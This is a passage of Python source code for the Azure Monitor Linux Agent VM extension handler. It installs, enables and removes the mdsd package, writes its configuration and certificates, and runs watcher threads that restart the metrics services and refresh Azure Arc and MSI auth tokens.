# This code is taken from the omsagent's extension wrapper.
# This same monkey patch fix is relevant for AMA extension as well.
# This monkey patch duplicates the one made in the waagent import above.
# It is necessary because on 2.6, the waagent monkey patch appears to be overridden
# by the python-future subprocess.check_output backport.
if sys.version_info < (2,7):
def check_output(*popenargs, **kwargs):
r"""Backport from subprocess module from python 2.7"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
# Exception classes used by this module.
class CalledProcessError(Exception):
def __init__(self, returncode, cmd, output=None):
self.returncode = returncode
self.cmd = cmd
self.output = output
def __str__(self):
return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode)
subprocess.check_output = check_output
subprocess.CalledProcessError = CalledProcessError
# Global Variables
PackagesDirectory = 'packages'
# TO BE CHANGED WITH EACH NEW RELEASE IF THE BUNDLE VERSION CHANGES
# TODO: Installer should automatically figure this out from the folder instead of requiring this update
BundleFileNameDeb = 'azure-mdsd_1.5.133-build.master.157_x86_64.deb'
BundleFileNameRpm = 'azure-mdsd_1.5.133-build.master.157_x86_64.rpm'
BundleFileName = ''
TelegrafBinName = 'telegraf'
InitialRetrySleepSeconds = 30
PackageManager = ''
PackageManagerOptions = ''
MdsdCounterJsonPath = '/etc/mdsd.d/config-cache/metricCounters.json'
# Commands
OneAgentInstallCommand = ''
OneAgentUninstallCommand = ''
RestartOneAgentServiceCommand = ''
DisableOneAgentServiceCommand = ''
# Error codes
DPKGLockedErrorCode = 56
MissingorInvalidParameterErrorCode = 53
UnsupportedOperatingSystem = 51
IndeterminateOperatingSystem = 51
# Configuration
HUtilObject = None
SettingsSequenceNumber = None
HandlerEnvironment = None
SettingsDict = None
# Change permission of log path - if we fail, that is not an exit case
try:
ext_log_path = '/var/log/azure/'
if os.path.exists(ext_log_path):
os.chmod(ext_log_path, 700)
except:
pass
def main():
"""
Main method
Parse out operation from argument, invoke the operation, and finish.
"""
init_waagent_logger()
waagent_log_info('Azure Monitoring Agent for Linux started to handle.')
# Determine the operation being executed
operation = None
try:
option = sys.argv[1]
if re.match('^([-/]*)(disable)', option):
operation = 'Disable'
elif re.match('^([-/]*)(uninstall)', option):
operation = 'Uninstall'
elif re.match('^([-/]*)(install)', option):
operation = 'Install'
elif re.match('^([-/]*)(enable)', option):
operation = 'Enable'
elif re.match('^([-/]*)(update)', option):
operation = 'Update'
elif re.match('^([-/]*)(metrics)', option):
operation = 'Metrics'
elif re.match('^([-/]*)(arc)', option):
operation = 'Arc'
except Exception as e:
waagent_log_error(str(e))
if operation is None:
log_and_exit('Unknown', 1, 'No valid operation provided')
# Set up for exit code and any error messages
exit_code = 0
message = '{0} succeeded'.format(operation)
exit_code = check_disk_space_availability()
if exit_code != 0:
message = '{0} failed due to low disk space'.format(operation)
log_and_exit(operation, exit_code, message)
# Invoke operation
try:
global HUtilObject
HUtilObject = parse_context(operation)
exit_code, output = operations[operation]()
# Exit code 1 indicates a general problem that doesn't have a more
# specific error code; it often indicates a missing dependency
if exit_code == 1 and operation == 'Install':
message = 'Install failed with exit code 1. Please check that ' \
'dependencies are installed. For details, check logs ' \
'in /var/log/azure/Microsoft.Azure.Monitor' \
'.AzureMonitorLinuxAgent'
elif exit_code is DPKGLockedErrorCode and operation == 'Install':
message = 'Install failed with exit code {0} because the ' \
'package manager on the VM is currently locked: ' \
'please wait and try again'.format(DPKGLockedErrorCode)
elif exit_code != 0:
message = '{0} failed with exit code {1} {2}'.format(operation,
exit_code, output)
except AzureMonitorAgentForLinuxException as e:
exit_code = e.error_code
message = e.get_error_message(operation)
except Exception as e:
exit_code = 1
message = '{0} failed with error: {1}\n' \
'Stacktrace: {2}'.format(operation, e,
traceback.format_exc())
# Finish up and log messages
log_and_exit(operation, exit_code, message)
def check_disk_space_availability():
"""
Check if there is the required space on the machine.
"""
try:
if get_free_space_mb("/var") < 500 or get_free_space_mb("/etc") < 500 :
# 52 is the exit code for missing dependency i.e. disk space
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
return 52
else:
return 0
except:
print('Failed to check disk usage.')
return 0
def get_free_space_mb(dirname):
"""
Get the free space in MB in the directory path.
"""
st = os.statvfs(dirname)
return (st.f_bavail * st.f_frsize) // (1024 * 1024)
def is_systemd():
"""
Check if the system is using systemd
"""
check_systemd = os.system("pidof systemd 1>/dev/null 2>&1")
return check_systemd == 0
def install():
"""
Ensure that this VM distro and version are supported.
Install the Azure Monitor Linux Agent package, using retries.
Note: install operation times out from WAAgent at 15 minutes, so do not
wait longer.
"""
find_package_manager("Install")
exit_if_vm_not_supported('Install')
public_settings, protected_settings = get_settings()
package_directory = os.path.join(os.getcwd(), PackagesDirectory)
bundle_path = os.path.join(package_directory, BundleFileName)
os.chmod(bundle_path, 100)
print(PackageManager, " and ", BundleFileName)
OneAgentInstallCommand = "{0} {1} -i {2}".format(PackageManager, PackageManagerOptions, bundle_path)
hutil_log_info('Running command "{0}"'.format(OneAgentInstallCommand))
# Retry, since install can fail due to concurrent package operations
exit_code, output = run_command_with_retries_output(OneAgentInstallCommand, retries = 15,
retry_check = retry_if_dpkg_locked,
final_check = final_check_if_dpkg_locked)
# Set task limits to max of 65K in suse 12
# Based on Task 9764411: AMA broken after 1.7 in sles 12 - https://dev.azure.com/msazure/One/_workitems/edit/9764411
vm_dist, vm_ver = find_vm_distro('Install')
if vm_dist.lower().startswith('suse'):
try:
suse_exit_code, suse_output = run_command_and_log("mkdir -p /etc/systemd/system/mdsd.service.d")
if suse_exit_code != 0:
return suse_exit_code, suse_output
suse_exit_code, suse_output = run_command_and_log("echo '[Service]' > /etc/systemd/system/mdsd.service.d/override.conf")
if suse_exit_code != 0:
return suse_exit_code, suse_output
suse_exit_code, suse_output = run_command_and_log("echo 'TasksMax=65535' >> /etc/systemd/system/mdsd.service.d/override.conf")
if suse_exit_code != 0:
return suse_exit_code, suse_output
suse_exit_code, suse_output = run_command_and_log("systemctl daemon-reload")
if suse_exit_code != 0:
return suse_exit_code, suse_output
except:
log_and_exit("install", MissingorInvalidParameterErrorCode, "Failed to update /etc/systemd/system/mdsd.service.d for suse 12,15" )
default_configs = {
"MDSD_LOG" : "/var/log",
"MDSD_ROLE_PREFIX" : "/var/run/mdsd/default",
"MDSD_SPOOL_DIRECTORY" : "/var/opt/microsoft/linuxmonagent",
"MDSD_OPTIONS" : "\"-A -c /etc/mdsd.d/mdsd.xml -d -r $MDSD_ROLE_PREFIX -S $MDSD_SPOOL_DIRECTORY/eh -e $MDSD_LOG/mdsd.err -w $MDSD_LOG/mdsd.warn -o $MDSD_LOG/mdsd.info\"",
"MCS_ENDPOINT" : "handler.control.monitor.azure.com",
"AZURE_ENDPOINT" : "https://monitor.azure.com/",
"ADD_REGION_TO_MCS_ENDPOINT" : "true",
"ENABLE_MCS" : "false",
"MONITORING_USE_GENEVA_CONFIG_SERVICE" : "false",
"MDSD_USE_LOCAL_PERSISTENCY" : "true",
#"OMS_TLD" : "int2.microsoftatlanta-int.com",
#"customResourceId" : "/subscriptions/42e7aed6-f510-46a2-8597-a5fe2e15478b/resourcegroups/amcs-test/providers/Microsoft.OperationalInsights/workspaces/amcs-pretend-linuxVM",
}
# Decide the mode
if public_settings is not None and public_settings.get("GCS_AUTO_CONFIG") == "true":
hutil_log_info("Detecting Auto-Config mode.")
return 0, ""
elif protected_settings is None or len(protected_settings) == 0:
default_configs["ENABLE_MCS"] = "true"
else:
# look for LA protected settings
for var in list(protected_settings.keys()):
if "_key" in var or "_id" in var:
default_configs[var] = protected_settings.get(var)
# check if required GCS params are available
MONITORING_GCS_CERT_CERTFILE = None
if "certificate" in protected_settings:
MONITORING_GCS_CERT_CERTFILE = base64.standard_b64decode(protected_settings.get("certificate"))
MONITORING_GCS_CERT_KEYFILE = None
if "certificateKey" in protected_settings:
MONITORING_GCS_CERT_KEYFILE = base64.standard_b64decode(protected_settings.get("certificateKey"))
MONITORING_GCS_ENVIRONMENT = ""
if "monitoringGCSEnvironment" in protected_settings:
MONITORING_GCS_ENVIRONMENT = protected_settings.get("monitoringGCSEnvironment")
MONITORING_GCS_NAMESPACE = ""
if "namespace" in protected_settings:
MONITORING_GCS_NAMESPACE = protected_settings.get("namespace")
MONITORING_GCS_ACCOUNT = ""
if "monitoringGCSAccount" in protected_settings:
MONITORING_GCS_ACCOUNT = protected_settings.get("monitoringGCSAccount")
MONITORING_GCS_REGION = ""
if "monitoringGCSRegion" in protected_settings:
MONITORING_GCS_REGION = protected_settings.get("monitoringGCSRegion")
MONITORING_CONFIG_VERSION = ""
if "configVersion" in protected_settings:
MONITORING_CONFIG_VERSION = protected_settings.get("configVersion")
MONITORING_GCS_AUTH_ID_TYPE = ""
if "monitoringGCSAuthIdType" in protected_settings:
MONITORING_GCS_AUTH_ID_TYPE = protected_settings.get("monitoringGCSAuthIdType")
MONITORING_GCS_AUTH_ID = ""
if "monitoringGCSAuthId" in protected_settings:
MONITORING_GCS_AUTH_ID = protected_settings.get("monitoringGCSAuthId")
if ((MONITORING_GCS_CERT_CERTFILE is None or MONITORING_GCS_CERT_KEYFILE is None) and (MONITORING_GCS_AUTH_ID_TYPE == "")) or MONITORING_GCS_ENVIRONMENT == "" or MONITORING_GCS_NAMESPACE == "" or MONITORING_GCS_ACCOUNT == "" or MONITORING_GCS_REGION == "" or MONITORING_CONFIG_VERSION == "":
waagent_log_error('Not all required GCS parameters are provided')
raise ParameterMissingException
else:
# set the values for GCS
default_configs["MONITORING_USE_GENEVA_CONFIG_SERVICE"] = "true"
default_configs["MONITORING_GCS_ENVIRONMENT"] = MONITORING_GCS_ENVIRONMENT
default_configs["MONITORING_GCS_NAMESPACE"] = MONITORING_GCS_NAMESPACE
default_configs["MONITORING_GCS_ACCOUNT"] = MONITORING_GCS_ACCOUNT
default_configs["MONITORING_GCS_REGION"] = MONITORING_GCS_REGION
default_configs["MONITORING_CONFIG_VERSION"] = MONITORING_CONFIG_VERSION
# write the certificate and key to disk
uid = pwd.getpwnam("syslog").pw_uid
gid = grp.getgrnam("syslog").gr_gid
if MONITORING_GCS_AUTH_ID_TYPE != "":
default_configs["MONITORING_GCS_AUTH_ID_TYPE"] = MONITORING_GCS_AUTH_ID_TYPE
if MONITORING_GCS_AUTH_ID != "":
default_configs["MONITORING_GCS_AUTH_ID"] = MONITORING_GCS_AUTH_ID
if MONITORING_GCS_CERT_CERTFILE is not None:
default_configs["MONITORING_GCS_CERT_CERTFILE"] = "/etc/mdsd.d/gcscert.pem"
fh = open("/etc/mdsd.d/gcscert.pem", "wb")
fh.write(MONITORING_GCS_CERT_CERTFILE)
fh.close()
os.chown("/etc/mdsd.d/gcscert.pem", uid, gid)
os.system('chmod {1} {0}'.format("/etc/mdsd.d/gcscert.pem", 400))
if MONITORING_GCS_CERT_KEYFILE is not None:
default_configs["MONITORING_GCS_CERT_KEYFILE"] = "/etc/mdsd.d/gcskey.pem"
fh = open("/etc/mdsd.d/gcskey.pem", "wb")
fh.write(MONITORING_GCS_CERT_KEYFILE)
fh.close()
os.chown("/etc/mdsd.d/gcskey.pem", uid, gid)
os.system('chmod {1} {0}'.format("/etc/mdsd.d/gcskey.pem", 400))
config_file = "/etc/default/mdsd"
config_updated = False
try:
if os.path.isfile(config_file):
data = []
new_data = ""
vars_set = set()
with open(config_file, "r") as f:
data = f.readlines()
for line in data:
for var in list(default_configs.keys()):
if var in line:
line = "export " + var + "=" + default_configs[var] + "\n"
vars_set.add(var)
break
new_data += line
for var in list(default_configs.keys()):
if var not in vars_set:
new_data += "export " + var + "=" + default_configs[var] + "\n"
with open("/etc/default/mdsd_temp", "w") as f:
f.write(new_data)
config_updated = True if len(new_data) > 0 else False
if not config_updated or not os.path.isfile("/etc/default/mdsd_temp"):
log_and_exit("install",MissingorInvalidParameterErrorCode, "Error while updating MCS Environment Variables in /etc/default/mdsd")
os.remove(config_file)
os.rename("/etc/default/mdsd_temp", config_file)
uid = pwd.getpwnam("syslog").pw_uid
gid = grp.getgrnam("syslog").gr_gid
os.chown(config_file, uid, gid)
os.system('chmod {1} {0}'.format(config_file, 400))
else:
log_and_exit("install", MissingorInvalidParameterErrorCode, "Could not find the file - /etc/default/mdsd" )
except:
log_and_exit("install", MissingorInvalidParameterErrorCode, "Failed to add MCS Environment Variables in /etc/default/mdsd" )
return exit_code, output
def check_kill_process(pstring):
for line in os.popen("ps ax | grep " + pstring + " | grep -v grep"):
fields = line.split()
pid = fields[0]
os.kill(int(pid), signal.SIGKILL)
def uninstall():
"""
Uninstall the Azure Monitor Linux Agent.
This is a somewhat soft uninstall. It is not a purge.
Note: uninstall operation times out from WAAgent at 5 minutes
"""
find_package_manager("Uninstall")
if PackageManager == "dpkg":
OneAgentUninstallCommand = "dpkg -P azure-mdsd"
elif PackageManager == "rpm":
OneAgentUninstallCommand = "rpm -e azure-mdsd"
else:
log_and_exit(operation, UnsupportedOperatingSystem, "The OS has neither rpm nor dpkg" )
hutil_log_info('Running command "{0}"'.format(OneAgentUninstallCommand))
# Retry, since uninstall can fail due to concurrent package operations
try:
exit_code, output = run_command_with_retries_output(OneAgentUninstallCommand, retries = 4,
retry_check = retry_if_dpkg_locked,
final_check = final_check_if_dpkg_locked)
except Exception as ex:
exit_code = 1
output = 'Uninstall failed with error: {0}\n' \
'Stacktrace: {1}'.format(ex, traceback.format_exc())
return exit_code, output
def enable():
"""
Start the Azure Monitor Linux Agent Service
This call will return non-zero or throw an exception if
the settings provided are incomplete or incorrect.
Note: enable operation times out from WAAgent at 5 minutes
"""
exit_if_vm_not_supported('Enable')
# Check if this is Arc VM and enable arc daemon if it is
if metrics_utils.is_arc_installed():
hutil_log_info("This VM is an Arc VM, Running the arc watcher daemon.")
start_arc_process()
if is_systemd():
OneAgentEnableCommand = "systemctl start mdsd"
else:
hutil_log_info("The VM doesn't have systemctl. Using the init.d service to start mdsd.")
OneAgentEnableCommand = "/etc/init.d/mdsd start"
public_settings, protected_settings = get_settings()
if public_settings is not None and public_settings.get("GCS_AUTO_CONFIG") == "true":
OneAgentEnableCommand = "systemctl start mdsdmgr"
if not is_systemd():
hutil_log_info("The VM doesn't have systemctl. Using the init.d service to start mdsdmgr.")
OneAgentEnableCommand = "/etc/init.d/mdsdmgr start"
hutil_log_info('Handler initiating onboarding.')
exit_code, output = run_command_and_log(OneAgentEnableCommand)
if exit_code == 0:
#start metrics process if enable is successful
start_metrics_process()
return exit_code, output
def disable():
"""
Disable Azure Monitor Linux Agent process on the VM.
Note: disable operation times out from WAAgent at 15 minutes
"""
# disable arc daemon if it is running
stop_arc_watcher()
#stop the metrics process
stop_metrics_process()
#stop the Azure Monitor Linux Agent service
if is_systemd():
DisableOneAgentServiceCommand = "systemctl stop mdsd"
else:
DisableOneAgentServiceCommand = "/etc/init.d/mdsd stop"
hutil_log_info("The VM doesn't have systemctl. Using the init.d service to stop mdsd.")
exit_code, output = run_command_and_log(DisableOneAgentServiceCommand)
return exit_code, output
def update():
"""
Update the current installation of AzureMonitorLinuxAgent
No logic to install the agent as agent -> install() will be called
with udpate because upgradeMode = "UpgradeWithInstall" set in HandlerManifest
"""
return 0, ""
def stop_metrics_process():
if telhandler.is_running(is_lad=False):
#Stop the telegraf and ME services
tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False)
if tel_out:
hutil_log_info(tel_msg)
else:
hutil_log_error(tel_msg)
#Delete the telegraf and ME services
tel_rm_out, tel_rm_msg = telhandler.remove_telegraf_service()
if tel_rm_out:
hutil_log_info(tel_rm_msg)
else:
hutil_log_error(tel_rm_msg)
if me_handler.is_running(is_lad=False):
me_out, me_msg = me_handler.stop_metrics_service(is_lad=False)
if me_out:
hutil_log_info(me_msg)
else:
hutil_log_error(me_msg)
me_rm_out, me_rm_msg = me_handler.remove_metrics_service(is_lad=False)
if me_rm_out:
hutil_log_info(me_rm_msg)
else:
hutil_log_error(me_rm_msg)
pids_filepath = os.path.join(os.getcwd(),'amametrics.pid')
# kill existing metrics watcher
if os.path.exists(pids_filepath):
with open(pids_filepath, "r") as f:
for pids in f.readlines():
kill_cmd = "kill " + pids
run_command_and_log(kill_cmd)
run_command_and_log("rm "+pids_filepath)
def start_metrics_process():
"""
Start metrics process that performs periodic monitoring activities
:return: None
"""
stop_metrics_process()
#start metrics watcher
oneagent_filepath = os.path.join(os.getcwd(),'agent.py')
args = ['python{0}'.format(sys.version_info[0]), oneagent_filepath, '-metrics']
log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w')
hutil_log_info('start watcher process '+str(args))
subprocess.Popen(args, stdout=log, stderr=log)
def metrics_watcher(hutil_error, hutil_log):
"""
Watcher thread to monitor metric configuration changes and to take action on them
"""
# check every 30 seconds
sleepTime = 30
# sleep before starting the monitoring.
time.sleep(sleepTime)
last_crc = None
me_msi_token_expiry_epoch = None
while True:
try:
if os.path.isfile(MdsdCounterJsonPath):
f = open(MdsdCounterJsonPath, "r")
data = f.read()
if (data != ''):
json_data = json.loads(data)
if len(json_data) == 0:
last_crc = hashlib.sha256(data.encode('utf-8')).hexdigest()
if telhandler.is_running(is_lad=False):
#Stop the telegraf and ME services
tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False)
if tel_out:
hutil_log(tel_msg)
else:
hutil_error(tel_msg)
#Delete the telegraf and ME services
tel_rm_out, tel_rm_msg = telhandler.remove_telegraf_service()
if tel_rm_out:
hutil_log(tel_rm_msg)
else:
hutil_error(tel_rm_msg)
if me_handler.is_running(is_lad=False):
me_out, me_msg = me_handler.stop_metrics_service(is_lad=False)
if me_out:
hutil_log(me_msg)
else:
hutil_error(me_msg)
me_rm_out, me_rm_msg = me_handler.remove_metrics_service(is_lad=False)
if me_rm_out:
hutil_log(me_rm_msg)
else:
hutil_error(me_rm_msg)
else:
crc = hashlib.sha256(data.encode('utf-8')).hexdigest()
if(crc != last_crc):
# Resetting the me_msi_token_expiry_epoch variable if we set up ME again.
me_msi_token_expiry_epoch = None
hutil_log("Start processing metric configuration")
hutil_log(data)
telegraf_config, telegraf_namespaces = telhandler.handle_config(
json_data,
"udp://127.0.0.1:" + metrics_constants.ama_metrics_extension_udp_port,
"unix:///var/run/mdsd/default_influx.socket",
is_lad=False)
me_handler.setup_me(is_lad=False)
start_telegraf_out, log_messages = telhandler.start_telegraf(is_lad=False)
if start_telegraf_out:
hutil_log("Successfully started metrics-sourcer.")
else:
hutil_error(log_messages)
start_metrics_out, log_messages = me_handler.start_metrics(is_lad=False)
if start_metrics_out:
hutil_log("Successfully started metrics-extension.")
else:
hutil_error(log_messages)
last_crc = crc
generate_token = False
me_token_path = os.path.join(os.getcwd(), "/config/metrics_configs/AuthToken-MSI.json")
if me_msi_token_expiry_epoch is None or me_msi_token_expiry_epoch == "":
if os.path.isfile(me_token_path):
with open(me_token_path, "r") as f:
authtoken_content = f.read()
if authtoken_content and "expires_on" in authtoken_content:
me_msi_token_expiry_epoch = authtoken_content["expires_on"]
else:
generate_token = True
else:
generate_token = True
if me_msi_token_expiry_epoch:
currentTime = datetime.datetime.now()
token_expiry_time = datetime.datetime.fromtimestamp(int(me_msi_token_expiry_epoch))
if token_expiry_time - currentTime < datetime.timedelta(minutes=30):
# The MSI Token will expire within 30 minutes. We need to refresh the token
generate_token = True
if generate_token:
generate_token = False
msi_token_generated, me_msi_token_expiry_epoch, log_messages = me_handler.generate_MSI_token()
if msi_token_generated:
hutil_log("Successfully refreshed metrics-extension MSI Auth token.")
else:
hutil_error(log_messages)
telegraf_restart_retries = 0
me_restart_retries = 0
max_restart_retries = 10
# Check if telegraf is running, if not, then restart
if not telhandler.is_running(is_lad=False):
if telegraf_restart_retries < max_restart_retries:
telegraf_restart_retries += 1
hutil_log("Telegraf binary process is not running. Restarting telegraf now. Retry count - {0}".format(telegraf_restart_retries))
tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False)
if tel_out:
hutil_log(tel_msg)
else:
hutil_error(tel_msg)
start_telegraf_out, log_messages = telhandler.start_telegraf(is_lad=False)
if start_telegraf_out:
hutil_log("Successfully started metrics-sourcer.")
else:
hutil_error(log_messages)
else:
hutil_error("Telegraf binary process is not running. Failed to restart after {0} retries. Please check telegraf.log".format(max_restart_retries))
else:
telegraf_restart_retries = 0
# Check if ME is running, if not, then restart
if not me_handler.is_running(is_lad=False):
if me_restart_retries < max_restart_retries:
me_restart_retries += 1
hutil_log("MetricsExtension binary process is not running. Restarting MetricsExtension now. Retry count - {0}".format(me_restart_retries))
me_out, me_msg = me_handler.stop_metrics_service(is_lad=False)
if me_out:
hutil_log(me_msg)
else:
hutil_error(me_msg)
start_metrics_out, log_messages = me_handler.start_metrics(is_lad=False)
if start_metrics_out:
hutil_log("Successfully started metrics-extension.")
else:
hutil_error(log_messages)
else:
hutil_error("MetricsExtension binary process is not running. Failed to restart after {0} retries. Please check /var/log/syslog for ME logs".format(max_restart_retries))
else:
me_restart_retries = 0
except IOError as e:
hutil_error('I/O error in monitoring metrics. Exception={0}'.format(e))
except Exception as e:
hutil_error('Error in monitoring metrics. Exception={0}'.format(e))
finally:
time.sleep(sleepTime)
def metrics():
"""
Take care of setting up telegraf and ME for metrics if configuration is present
"""
pids_filepath = os.path.join(os.getcwd(), 'amametrics.pid')
py_pid = os.getpid()
with open(pids_filepath, 'w') as f:
f.write(str(py_pid) + '\n')
watcher_thread = Thread(target = metrics_watcher, args = [hutil_log_error, hutil_log_info])
watcher_thread.start()
watcher_thread.join()
return 0, ""
def start_arc_process():
"""
Start arc process that performs periodic monitoring activities
:return: None
"""
hutil_log_info("stopping previously running arc process")
stop_arc_watcher()
hutil_log_info("starting arc process")
#start arc watcher
oneagent_filepath = os.path.join(os.getcwd(),'agent.py')
args = ['python{0}'.format(sys.version_info[0]), oneagent_filepath, '-arc']
log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w')
hutil_log_info('start watcher process '+str(args))
subprocess.Popen(args, stdout=log, stderr=log)
def start_arc_watcher():
"""
Take care of starting arc_watcher daemon if the VM has arc running
"""
hutil_log_info("Starting the watcher")
print("Starting the watcher")
pids_filepath = os.path.join(os.getcwd(), 'amaarc.pid')
py_pid = os.getpid()
print("pid ", py_pid)
with open(pids_filepath, 'w') as f:
f.write(str(py_pid) + '\n')
hutil_log_info("Written all the pids")
print("Written all the pids")
watcher_thread = Thread(target = arc_watcher, args = [hutil_log_error, hutil_log_info])
watcher_thread.start()
watcher_thread.join()
return 0, ""
# Dictionary of operations strings to methods
operations = {'Disable' : disable,
'Uninstall' : uninstall,
'Install' : install,
'Enable' : enable,
'Update' : update,
'Metrics' : metrics,
'Arc' : start_arc_watcher,
}
def stop_arc_watcher():
"""
Take care of stopping arc_watcher daemon if the VM has arc running
"""
pids_filepath = os.path.join(os.getcwd(),'amaarc.pid')
# kill existing arc watcher
if os.path.exists(pids_filepath):
with open(pids_filepath, "r") as f:
for pids in f.readlines():
proc = subprocess.Popen(["ps -o cmd= {0}".format(pids)], stdout=subprocess.PIPE, shell=True)
output = proc.communicate()[0]
if output and "arc" in output:
kill_cmd = "kill " + pids
run_command_and_log(kill_cmd)
# Delete the file after to avoid clutter
os.remove(pids_filepath)
def arc_watcher(hutil_error, hutil_log):
"""
This is needed to override mdsd's syslog permissions restriction which prevents mdsd
from reading temporary key files that are needed to make https calls to get an MSI token for arc during onboarding to download amcs config
This method spins up a process that will continuously keep refreshing that particular file path with valid keys
So that whenever mdsd needs to refresh it's MSI token, it is able to find correct keys there to make the https calls
"""
# check every 25 seconds
sleepTime = 25
# sleep before starting the monitoring.
time.sleep(sleepTime)
while True:
try:
arc_token_mdsd_dir = "/etc/mdsd.d/arc_tokens/"
if not os.path.exists(arc_token_mdsd_dir):
os.makedirs(arc_token_mdsd_dir)
else:
# delete the existing keys as they might not be valid anymore
for filename in os.listdir(arc_token_mdsd_dir):
filepath = arc_token_mdsd_dir + filename
os.remove(filepath)
arc_endpoint = metrics_utils.get_arc_endpoint()
try:
msiauthurl = arc_endpoint + "/metadata/identity/oauth2/token?api-version=2019-11-01&resource=https://monitor.azure.com/"
req = urllib.request.Request(msiauthurl, headers={'Metadata':'true'})
res = urllib.request.urlopen(req)
except:
# The above request is expected to fail and add a key to the path -
authkey_dir = "/var/opt/azcmagent/tokens/"
if not os.path.exists(authkey_dir):
raise Exception("Unable to find the auth key file at {0} returned from the arc msi auth request.".format(authkey_dir))
# Copy the tokens to mdsd accessible dir
for filename in os.listdir(authkey_dir):
filepath = authkey_dir + filename
print(filepath)
shutil.copy(filepath, arc_token_mdsd_dir)
# Change the ownership of the mdsd arc token dir to be accessible by syslog (since mdsd runs as syslog user)
os.system("chown -R syslog:syslog {0}".format(arc_token_mdsd_dir))
except Exception as e:
hutil_error('Error in arc watcher process while copying token for arc MSI auth queries. Exception={0}'.format(e))
finally:
time.sleep(sleepTime)
def parse_context(operation):
"""
Initialize a HandlerUtil object for this operation.
If the required modules have not been imported, this will return None.
"""
hutil = None
if ('Utils.WAAgentUtil' in sys.modules
and 'Utils.HandlerUtil' in sys.modules):
try:
logFileName = 'extension.log'
hutil = HUtil.HandlerUtility(waagent.Log, waagent.Error, logFileName=logFileName)
hutil.do_parse_context(operation)
# parse_context may throw KeyError if necessary JSON key is not
# present in settings
except KeyError as e:
waagent_log_error('Unable to parse context with error: ' \
'{0}'.format(e))
raise ParameterMissingException
return hutil
def find_package_manager(operation):
"""
Checks if the dist is debian based or centos based and assigns the package manager accordingly
"""
global PackageManager
global PackageManagerOptions
global BundleFileName
dist, ver = find_vm_distro(operation)
dpkg_set = set(["debian", "ubuntu"])
rpm_set = set(["oracle", "redhat", "centos", "red hat", "suse", "sles"])
for dpkg_dist in dpkg_set:
if dist.lower().startswith(dpkg_dist):
PackageManager = "dpkg"
# OK to replace the /etc/default/mdsd, since the placeholders gets replaced again.
# Otherwise, the package manager prompts for action (Y/I/N/O/D/Z) [default=N]
PackageManagerOptions = "--force-overwrite --force-confnew"
BundleFileName = BundleFileNameDeb
break
for rpm_dist in rpm_set:
if dist.lower().startswith(rpm_dist):
PackageManager = "rpm"
# Same as above.
PackageManagerOptions = "--force"
BundleFileName = BundleFileNameRpm
break
if PackageManager == "":
log_and_exit(operation, UnsupportedOperatingSystem, "The OS has neither rpm nor dpkg" )
def find_vm_distro(operation):
"""
Finds the Linux Distribution this vm is running on.
"""
vm_dist = vm_id = vm_ver = None
parse_manually = False
try:
vm_dist, vm_ver, vm_id = platform.linux_distribution()
except AttributeError:
try:
vm_dist, vm_ver, vm_id = platform.dist()
except AttributeError:
hutil_log_info("Falling back to /etc/os-release distribution parsing")
# Some python versions *IF BUILT LOCALLY* (ex 3.5) give string responses (ex. 'bullseye/sid') to platform.dist() function
# This causes exception in the method below. Thus adding a check to switch to manual parsing in this case
try:
temp_vm_ver = int(vm_ver.split('.')[0])
except:
parse_manually = True
if (not vm_dist and not vm_ver) or parse_manually: # SLES 15 and others
try:
with open('/etc/os-release', 'r') as fp:
for line in fp:
if line.startswith('ID='):
vm_dist = line.split('=')[1]
vm_dist = vm_dist.split('-')[0]
vm_dist = vm_dist.replace('\"', '').replace('\n', '')
elif line.startswith('VERSION_ID='):
vm_ver = line.split('=')[1]
vm_ver = vm_ver.replace('\"', '').replace('\n', '')
except:
log_and_exit(operation, IndeterminateOperatingSystem, 'Indeterminate operating system')
return vm_dist, vm_ver
def is_vm_supported_for_extension(operation):
"""
Checks if the VM this extension is running on is supported by AzureMonitorAgent
Returns for platform.linux_distribution() vary widely in format, such as
'7.3.1611' returned for a VM with CentOS 7, so the first provided
digits must match
The supported distros of the AzureMonitorLinuxAgent are allowed to utilize
this VM extension. All other distros will get error code 51
"""
supported_dists = {'redhat' : ['6', '7', '8'], # Rhel
'centos' : ['6', '7', '8'], # CentOS
'red hat' : ['6', '7', '8'], # Oracle, RHEL
'oracle' : ['6', '7', '8'], # Oracle
'debian' : ['8', '9', '10'], # Debian
'ubuntu' : ['14.04', '16.04', '18.04', '20.04'], # Ubuntu
'suse' : ['12'], 'sles' : ['15'] # SLES
}
vm_supported = False
vm_dist, vm_ver = find_vm_distro(operation)
# Find this VM distribution in the supported list
for supported_dist in list(supported_dists.keys()):
if not vm_dist.lower().startswith(supported_dist):
continue
# Check if this VM distribution version is supported
vm_ver_split = vm_ver.split('.')
for supported_ver in supported_dists[supported_dist]:
supported_ver_split = supported_ver.split('.')
# If vm_ver is at least as precise (at least as many digits) as
# supported_ver and matches all the supported_ver digits, then
# this VM is guaranteed to be supported
vm_ver_match = True
for idx, supported_ver_num in enumerate(supported_ver_split):
try:
supported_ver_num = int(supported_ver_num)
vm_ver_num = int(vm_ver_split[idx])
except IndexError:
vm_ver_match = False
break
if vm_ver_num != supported_ver_num:
vm_ver_match = False
break
if vm_ver_match:
vm_supported = True
break
if vm_supported:
break
return vm_supported, vm_dist, vm_ver
def exit_if_vm_not_supported(operation):
"""
Check if this VM distro and version are supported by the AzureMonitorLinuxAgent.
If VM is supported, find the package manager present in this distro
If this VM is not supported, log the proper error code and exit.
"""
vm_supported, vm_dist, vm_ver = is_vm_supported_for_extension(operation)
if not vm_supported:
log_and_exit(operation, UnsupportedOperatingSystem, 'Unsupported operating system: ' \
'{0} {1}'.format(vm_dist, vm_ver))
return 0
def run_command_and_log(cmd, check_error = True, log_cmd = True):
"""
Run the provided shell command and log its output, including stdout and
stderr.
The output should not contain any PII, but the command might. In this case,
log_cmd should be set to False.
"""
exit_code, output = run_get_output(cmd, check_error, log_cmd)
if log_cmd:
